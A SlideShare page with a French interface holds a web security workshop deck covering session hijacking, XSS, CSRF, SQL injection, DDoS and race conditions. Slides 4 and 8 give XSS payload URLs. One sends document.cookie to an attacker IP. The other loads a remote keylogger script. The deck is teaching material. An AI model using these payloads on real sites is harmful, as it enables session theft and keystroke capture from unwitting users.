Ce diaporama a bien été signalé.
Le téléchargement de votre SlideShare est en cours. ×

Web-Security-Application.pptx

Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Chargement dans…3
×

Consultez-les par la suite

1 sur 30 Publicité

Plus De Contenu Connexe

Similaire à Web-Security-Application.pptx (20)

Publicité

Web-Security-Application.pptx

  1. 1. Workshop Web Security application
  2. 2. DAOULAT KHALIL github.com/Vvoox fb.com/daoulat.khalil
  3. 3. Session Hijacking TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguising itself as one of the authenticated users. This type of attack is possible because authentication typically is only done at the start of a TCP session.
  4. 4. The HJ Attack: Send to the victim : http://site.com//?name=<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>
  5. 5. XSS Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
  6. 6. XSS : Persistent (or stored) The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
  7. 7. XSS : Non-persistent (reflected) Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. The attack string is included as part of the crafted URI or HTTP parameters, improperly processed by the application, and returned to the victim.
  8. 8. XSS : Capture the keystrokes by injecting a keylogger In this attack scenario, we will inject a JavaScript keylogger into the vulnerable web page and we will capture all the keystrokes of the user within the current page. http://Site.com/crisis/?name=<script src="http://My_IP/Crisis.js"></script>
  9. 9. XSS : Keylogger
  10. 10. XSS : Keylogger
  11. 11. CSRF Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other.
  12. 12. SQL Injection
  13. 13. SQL Injection
  14. 14. SQL Injection
  15. 15. Type 1 : Error-based SQLi the attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
  16. 16. Type 2 : Union-based SQLi this technique takes advantage of the UNION SQL operator, which fuses multiple select statements generated by the database to get a single HTTP response. This response may contain data that can be leveraged by the attacker.
  17. 17. SQL Injection
  18. 18. DDOS ATTACK
  19. 19. DDos Attack a denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
  20. 20. Ddos Attack
  21. 21. DDos Attack
  22. 22. Race Condition A race condition or race hazard is the condition of an electronics, software, or other system where the system's substantive behavior is dependent on the sequence or timing of other uncontrollable events. It becomes a bug when one or more of the possible behaviors is undesirable.
  23. 23. Race Condition
  24. 24. THE End Any Questions?

×